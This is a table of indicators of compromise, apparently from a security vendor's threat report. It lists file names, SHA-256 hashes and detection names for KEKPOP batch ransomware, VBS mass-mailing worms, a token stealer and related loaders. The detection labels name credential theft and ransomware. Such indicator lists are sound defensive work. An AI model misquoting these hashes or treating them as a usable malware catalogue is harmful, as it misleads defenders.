| | a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c | Ransom.BAT.KEKPOP.YXCERT |
| | 0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 | Ransom.BAT.KEKPOP.YXCERT |
| black.bat | 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 | Trojan.BAT.KEKPOP.YXCEST |
| ycynlog.cmd | 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c | TrojanSpy.BAT.KEKPOP.YXCEST |
| YcynNote.txt | 4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 | Ransom.BAT.KEKPOP.YXCERT.note |
| other.txt | a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 | N/A - non-malicious component |
| loveletter.vbs | f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 | Worm.VBS.MASSMAIL.YXCEST |
| mail.vbs | 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 | Worm.VBS.MASSMAIL.YXCEST |
| GetToken.exe | 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 | Trojan.MSIL.TOKENSTEALER.YXCES |
| ForMe.exe | | N/A |
| | 316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 | Trojan.LNK.KEKPOP.YXCEST |
| | 6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c | Trojan.LNK.KEKPOP.YXCEST |
| Read_Me.txt.cmd | 77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd | Trojan.BAT.POWLOAD.TIAOELB |
| Main File (WinBugsFix.cmd) | 40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 | Ransom.BAT.KEKPOP.YXCEST |
| | b0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 | Ransom.BAT.KEKPOP.YXCEST |